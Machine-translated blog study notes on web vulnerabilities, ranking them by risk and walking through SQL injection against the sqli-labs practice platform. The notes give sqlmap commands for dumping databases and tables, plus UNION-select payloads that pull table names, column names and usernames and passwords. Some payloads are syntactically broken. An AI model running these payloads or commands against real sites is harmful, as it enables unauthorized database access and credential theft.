当前位置:网站首页>Network Security Learning - Web vulnerabilities (Part 1)
Network Security Learning - Web vulnerabilities (Part 1)
2022-07-06 02:32:00 【haoaaao】
Note source :11.WEB Loophole ——SQL Knowledge points must be understood when injecting · Language sparrow
( The blogger's notes are too detailed , It's more useful to look at his than mine , Borrowing is convenient for future review )
One 、web Knowledge points of vulnerability must be understood
1、 common web The harm of loopholes ️
(1)、sql Inject
(2)、xss
(3)、xxe
(4)、 Upload files
(5)、 File contains
(6)、 File read
(7)、csrf( User request forgery )
(8)、ssrf( Server side Request Forgery )
(9)、 Deserialization
(10)、 Code execution
(11)、 Logical loopholes
(12)、 Unauthorized access
Leakage of sensitive information
(13)、 Command execution
(14)、 Directory traversal
2、 Hierarchy
(1) High risk vulnerability :
SQL Inject 、 Upload files 、 File contains 、 Code execution 、 Unauthorized access 、 Command execution .
influence : Directly affect the website permissions and database permissions , Be able to obtain data or sensitive files of the website . Data security and permission loss are high-risk vulnerabilities .
(2) Medium risk loopholes
Deserialization 、 Logical security .
(3) Low risk vulnerability
XSS cross-site 、 Directory traversal 、 File read
influence : Website source code , Some accounts and passwords of the website
3、 application
( pikachu Vulnerability training platform ,gihub Download the source code ,phpstudy build )
CTF:SQL Inject 、 Upload files 、 Deserialization 、 Code execution ;
SRC: Holes can appear in the picture , There are many logical security problems ;
Red and blue against : High risk vulnerabilities involved , Upload files 、 File contains 、 Code execution 、 Command execution .
Two 、sql Inject
1、 Briefly sql Inject
(1)sql Injection generation principle :
1) The parameters entered by the user are not strictly filtered ( Such as filtering single and double quotation marks Angle brackets, etc ), It is taken to the database to execute , It's caused SQL Inject ;
2) It uses string splicing to construct SQL sentence .
(2)sql Injection classification :
1) According to the injection method, it can be divided into : Joint query injection 、 Error reporting injection 、 Boolean Injection 、 Delay Injection 、 Stack Injection
2) According to the data type, it can be divided into : Character ( That is, the input is filtered with symbols )、 Numerical type ( That is, the input is not filtered with symbols )
3) From the injection position, it can be classified as :GET data ( The data submission method is GET, Most of them exist in the address bar )、POST data ( The data submission method is POST, Most of them exist in the input box )、HTTP Head ( The data submission method is HTTP Head )、cookie data ( The data submission method is cookie)
(3)sql Injection hazard :
(4) Pre knowledge
1) stay MYSQL5.0 In the above version ,MYSQL There is a built-in database named information_schema, It is a storage record with all database names , Table name , Database of column names , It is also equivalent to querying it to obtain the table name or column name information under the specified database .
2) Symbols in the database "." Represents the next level , Such as xiaodi.user Express xiaodi Database based user Table name .
3) Parameters :
information_schema.tables: A table that records all table name information
information_schema.columns: A table that records all column name information
table_name: Table name
column_name: Name
table_schema: Database name
user() View the current MySQL Login user name
database() View current usage MySQL Database name
version() View the current MySQL edition
(5) Injection point judgment
(6)sql Injection steps :
1) Injection of statements
2)sqlmap utilize
a) Get database name
get type :python sqlmap.py -u "url" --cookie="" --dbs --batch
post type : python sqlmap.py -u "url" --cookie="" --data="payload value " --dbs --batch
b) Get table name
get type :python sqlmap.py -u "url" --cookie="" -D Database name --tables --batch
post type :python sqlmap.py -u "url" --cookie="" --data="payload value " -D Database name --tables --batch
c) Get the information in the table
get type :python sqlmap.py -u "url" --cookie="" -D Database name --tables -T Table name --dump --batch
post type :python sqlmap.py -u "url" --cookie="" --data="payload value " -D Database name --tables -T Table name --dump --batch
(7) demonstration
( recommend sqlilabs Platform practice , Special sql Inject into the practice platform )
Law 1 、sql Injection of statements
1) test :
// There was an error entering special characters in the web page , It shows that there is an injection point with database query , There is sql Inject holes , After trying , It is found that single quotation marks can close statements , Web page pair # Conduct url escape , Use %23 Instead of , Comment out the following statements
2)order by Number of query Columns :
3 Column without error ,4 Wrong presentation , So there is 3 Column
3) The joint query , Query database name ( Using federated queries , You need to change the content of the previous query to impossible ):
union select 1,2,3 
The first column does not show , So in 2 or 3 Column query database name :
union select 1,database(),3 
4) Joint query database table name
union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='security'),3% 
5) Query sensitive column information in the table :
union select 1,(select group_concat(column_name) from information_schema.columns where table_name='users') 
6) Further query sensitive information in the column , Such as username、password
union select(group_concat(username,password) from users) 
2、mysql Inject
3、 Type and submit injection
4、oracle、mangodb Injection, etc.
5、 Query method and error reporting blind note
6、 secondary 、 encryption 、dns Isoinjection
7、 Stacking and waf Bypass injection
8、sqlmap Bypass waf
3、 ... and 、 Upload files
边栏推荐
- 2022 China eye Expo, Shandong vision prevention and control exhibition, myopia, China myopia correction Exhibition
- [Digital IC manual tearing code] Verilog asynchronous reset synchronous release | topic | principle | design | simulation
- RDD creation method of spark
- 力扣今日題-729. 我的日程安排錶 I
- Black high-end responsive website dream weaving template (adaptive mobile terminal)
- [Yunju entrepreneurial foundation notes] Chapter II entrepreneur test 10
- [robot hand eye calibration] eye in hand
- Sword finger offer 29 Print matrix clockwise
- 一题多解,ASP.NET Core应用启动初始化的N种方案[上篇]
- SSM 程序集
猜你喜欢
High number_ Vector algebra_ Unit vector_ Angle between vector and coordinate axis
![[Yunju entrepreneurial foundation notes] Chapter II entrepreneur test 8](/img/16/33f5623625ba817e6e022b5cb7ff5d.jpg)
[Yunju entrepreneurial foundation notes] Chapter II entrepreneur test 8
剑指 Offer 29. 顺时针打印矩阵
Shell script updates stored procedure to database
Spark accumulator
![[Yunju entrepreneurial foundation notes] Chapter II entrepreneur test 21](/img/73/4050a592fdd99bf06e8fd853b157b6.jpg)
[Yunju entrepreneurial foundation notes] Chapter II entrepreneur test 21
Overview of spark RDD
数据工程系列精讲(第四讲): Data-centric AI 之样本工程
力扣今日題-729. 我的日程安排錶 I
剑指 Offer 30. 包含min函数的栈
随机推荐
一题多解,ASP.NET Core应用启动初始化的N种方案[上篇]
[untitled] a query SQL execution process in the database
Sword finger offer 30 Stack containing min function
【社区人物志】专访马龙伟:轮子不好用,那就自己造!
Initial understanding of pointer variables
【coppeliasim】高效传送带
技术管理进阶——什么是管理者之体力、脑力、心力
Minecraft 1.18.1, 1.18.2 module development 22 Sniper rifle
MySQL (IV) - transactions
[Digital IC manual tearing code] Verilog asynchronous reset synchronous release | topic | principle | design | simulation
一个复制也能玩出花来
Use the list component to realize the drop-down list and address list
RDD conversion operator of spark
[Yunju entrepreneurial foundation notes] Chapter II entrepreneur test 9
The third level of C language punch in
好用的 JS 脚本
Exness: Mercedes Benz's profits exceed expectations, and it is predicted that there will be a supply chain shortage in 2022
剑指 Offer 30. 包含min函数的栈
【无标题】数据库中一条查询SQL执行的过程
Crawler (9) - scrape framework (1) | scrape asynchronous web crawler framework